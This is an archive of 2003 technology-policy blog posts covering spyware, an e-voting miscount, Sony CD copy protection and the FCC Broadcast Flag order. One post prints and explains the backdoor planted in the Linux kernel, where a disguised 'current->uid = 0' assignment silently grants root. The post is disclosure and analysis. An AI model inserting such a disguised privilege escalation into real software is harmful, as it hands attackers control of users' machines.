Archives for November 2003

CDT Report on Spyware

The Center for Democracy and Technology has issued a sensible and accessible paper about the spyware problem and associated policy issues.

Spyware is software, installed on your computer without your consent, that gathers information about what you do on your computer. It’s shockingly common – if you are a typical active web surfer using Internet Explorer in its default configuration, and you haven’t been taking specific steps to protect yourself against spyware, then you probably have several spyware programs on your computer right now.

CDT recommends that end users protect themselves by using anti-spyware tools such as AdAware, Spybot Search and Destroy, Spyware Eliminator, or BPS Spyware/Adware Remover. (I have had good luck with Spybot Search and Destroy.)

At the policy level, CDT is lukewarm about attempts to ban spyware specifically, because of the difficult line-drawing exercise involved in distinguishing spyware from certain types of legitimate programs. They argue instead for policies that address the underlying problems: installation without consent, and surreptitious monitoring of user behavior.

Kudos to CDT for advancing the policy discussion on this often overlooked issue.

Flaky Voting Technology

Opponents of unauditable e-voting technology often talk about the threat of fraud. They worry that somebody will compromise a voting machine or will corrupt the machines’ software, to steal an election. We should worry about fraud. But just as important, and more likely, is the possibility that software bugs will cause a miscount that gives an election to the wrong candidate.

This may be what happened two weeks ago in a school board race in Fairfax County, Virginia. David Cho at the Washington Post reports:

School Board member Rita S. Thompson (R), who lost a close race to retain her at-large seat, said yesterday that the new computers might have taken votes from her. Voters in three precincts reported that when they attempted to vote for her, the machines initially displayed an “x” next to her name but then, after a few seconds, the “x” disappeared.

In response to Thompson’s complaints, county officials tested one of the machines in question yesterday and discovered that it seemed to subtract a vote for Thompson in about “one out of a hundred tries,” said Margaret K. Luca, secretary of the county Board of Elections.

“It’s hard not to think that I have been robbed,” said Thompson, whose 77,796 recorded votes left her 1,662 shy of reelection. She is considering her next step, and said she was wary of challenging the election results: “I’m not sure the county as a whole is up for that. I’m not sure I’m up for that.”
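
A quick back-of-the-envelope calculation shows why that one-in-a-hundred figure matters. Purely as an illustration, and on the strong (and unverifiable) assumption that the drop rate measured on that one machine applied uniformly to every vote cast for Thompson, a short C program makes the arithmetic concrete:

#include <stdio.h>

int main(void) {
    /* Figures from the Washington Post story quoted above. */
    double recorded  = 77796.0;  /* votes recorded for Thompson */
    double drop_rate = 0.01;     /* "one out of a hundred tries" (assumed uniform) */

    /* If 1% of attempted votes vanished, the recorded total is 99%
     * of the attempted total. */
    double attempted = recorded / (1.0 - drop_rate);

    printf("estimated dropped votes: %.0f\n", attempted - recorded);
    return 0;
}

That works out to roughly 786 dropped votes. Under these assumptions the bug alone would not close the 1,662-vote gap, but without an independent record nobody can check.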

And how do we know the cause was a bug, rather than fraud? Because the error was visible to voters. If this had been fraud, the “X” on the screen would never have disappeared – but the vote would have been given, silently, to the wrong candidate.

You could hardly construct a better textbook illustration of the importance of having a voter-verifiable paper trail. The paper trail would have helped voters notice the disappearance of their votes, and it would have provided a reliable record to consult in a later recount. As it is, we’ll never know who really won the election.

Linux Backdoor Attempt Thwarted

Kerneltrap.org reports that somebody tried last week to sneak a snippet of malicious code into the Linux kernel’s source code, to create a backdoor that could be exploited later to seize control of Linux machines. Fortunately, members of the software development team spotted the problem the next day and removed the offending code.

The malicious code snippet was small but cleverly constructed, so that most programmers would miss the problem on a casual reading of the code.

This incident illuminates an interesting debate on the security tradeoffs between open-source and proprietary code. Opponents of open source argue that the open development process makes it easier for a bad guy to inject malicious code. Fans of open source argue that open code makes it easier for the good guys to spot problems. Both groups can find some support in this story, in which an unknown person did inject malicious code, and open-source developers did read the code and spot the problem.

What we don’t know is how often this sort of thing happens in proprietary software development. There must be some attempts to insert malicious code, given the amount of money at stake and the sheer number of people who have the opportunity to try inserting a backdoor. But we don’t know how many people try, or how quickly they are caught.

[Technogeek readers: The offending code is below. Can you spot the problem?

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
]
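
Spoiler, for those who don't want to puzzle it out: the trick is the single "=" in "current->uid = 0". In C, "=" assigns rather than compares, so this seemingly innocent error check silently sets the calling process's user ID to 0, that is, root, whenever it is called with the bogus option combination __WCLONE|__WALL. And because the assignment expression evaluates to 0 (false), the -EINVAL branch never runs, so nothing visible happens. Annotated:

/* As planted: '=' silently makes the caller root, and the whole
 * condition evaluates to false, so retval is never set. */
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

/* What an innocuous root-only check would have looked like
 * ('==' compares instead of assigning): */
if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;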

New Sony CD-DRM Technology Upcoming

Reuters reports that a new CD copy-protection technology from Sony debuted yesterday in Germany, on a recording by the group Naturally Seven. Does anybody know how I can get a copy of this CD?

UPDATE (12:30 PM): Thanks to Joe Barillari and Scott Ananian for pointing me to amazon.de, where I ordered the CD. (At least I think I did; my German is pretty poor.)

Broadcast Flag Scorecard

Before the FCC issued its Broadcast Flag Order, I wrote a post on “Reading the Broadcast Flag Rules”, in which I recommended reading the eventual Order carefully since “the details can make a big difference.” I pointed to four specific choices the FCC had to make.

Let’s look at how the FCC chose. For each of the four issues I identified, I’ll quote in italics my previous posting, and then I’ll summarize the FCC’s action.

First, look at the criteria that an anti-copying technology must meet to be on the list of approved technologies. Must a technology give copyright owners control over all uses of content; or is a technology allowed [to] support legal uses such as time-shifting; or is it required to support such uses?

The Order says that technologies must prevent “indiscriminate redistribution”, but it isn’t precise about what that term means. The exact scope of permissible redistribution is deferred to a later rulemaking. There is also some language expressing a desire not to control copying within the home, but that desire may not be backed by a formal requirement.

Verdict: This issue is still unresolved; perhaps the later rulemaking will clarify it.

Second, look at who decides which technologies can be on the approved list. Whoever makes this decision will control entry into the market for digital TV decoders. Is this up to the movie and TV industries; or does an administrative body like the FCC decide; or is each vendor responsible for determining whether their own technology meets the requirements?

This issue was deferred to a later rulemaking process, so we don’t know what the final answer will be. The FCC does appear to understand the danger inherent in letting the entertainment industry control the list.

The Order does establish an interim approval mechanism, in which the FCC makes the final decisions, after a streamlined filing and counter-filing process by the affected parties.

Verdict: This issue was deferred until later, but the FCC seems to be leaning in the right direction.

Third, see whether the regulatory process allows for the possibility that no suitable anti-copying technology exists. Will the mandate be delayed if no strong anti-copying technology exists; or do the rules require that some technology be certified by a certain date, even if none is up to par?

The Order doesn’t address this issue head-on. It does say that to qualify, a technology need only resist attacks by ordinary users using widely available tools. This decision, along with the lack of precision about the scope of home copying that will be allowed, makes it easier to find a compliant technology later.

Verdict: This issue was not specifically addressed; it may be clarified in the later rulemaking.

Finally, look at which types of devices are subject to design mandates. To be covered, must a device be primarily designed for decoding digital TV; or is it enough for it to be merely capable of doing so? Do the mandates apply broadly to “downstream devices”? And is something a “downstream device” based on what it is primarily designed to do, or on what it is merely capable of doing?

This last issue is the most important, since it defines how broadly the rule will interfere with technological progress. The worst-case scenario is an overbroad rule that ends up micro-managing the design of general-purpose technologies like personal computers and the Internet. I know the FCC means well, but I wish I could say I was 100% sure that they wouldn't make that mistake.

The Order regulates Digital TV demodulators, as well as Transport Stream Processors (which take the demodulated signal and separate it into its digital audio, video, and metadata components).
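
For the curious, here is a rough sketch of the kind of data a Transport Stream Processor handles; this is my illustration, not anything taken from the Order. MPEG-2 transport streams arrive as fixed 188-byte packets, each tagged with a 13-bit Packet Identifier (PID) that tells a demultiplexer which elementary stream (audio, video, or metadata) the payload belongs to:

#include <stdint.h>
#include <stdio.h>

#define TS_PACKET_SIZE 188
#define TS_SYNC_BYTE   0x47

/* Extract the 13-bit PID from an MPEG-2 transport stream packet;
 * returns -1 if the packet doesn't begin with the sync byte. */
static int ts_packet_pid(const uint8_t *pkt)
{
    if (pkt[0] != TS_SYNC_BYTE)
        return -1;
    return ((pkt[1] & 0x1F) << 8) | pkt[2];
}

int main(void)
{
    uint8_t pkt[TS_PACKET_SIZE];

    /* Read packets from stdin and report which stream each belongs to. */
    while (fread(pkt, 1, sizeof pkt, stdin) == sizeof pkt) {
        int pid = ts_packet_pid(pkt);
        if (pid >= 0)
            printf("packet for PID 0x%04x\n", pid);
    }
    return 0;
}

It is roughly this layer of processing, separating and routing the demodulated stream's components, that the Order's design mandates reach.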

The impact on general-purpose computers is a bit hard to determine. It appears that if a computer contains a DTV receiver card, the communications between that card and the rest of the computer would be regulated. This would then impact the design of any applications or device drivers that handle the DTV stream coming from the card.

Verdict: The FCC seems to have been trying to limit the negative impact of the Order by limiting its scope, but some broad impacts seem to be inevitable side-effects of mandating any kind of Flag.

Bottom line: The FCC’s order will be harmful; but it could have been much, much worse.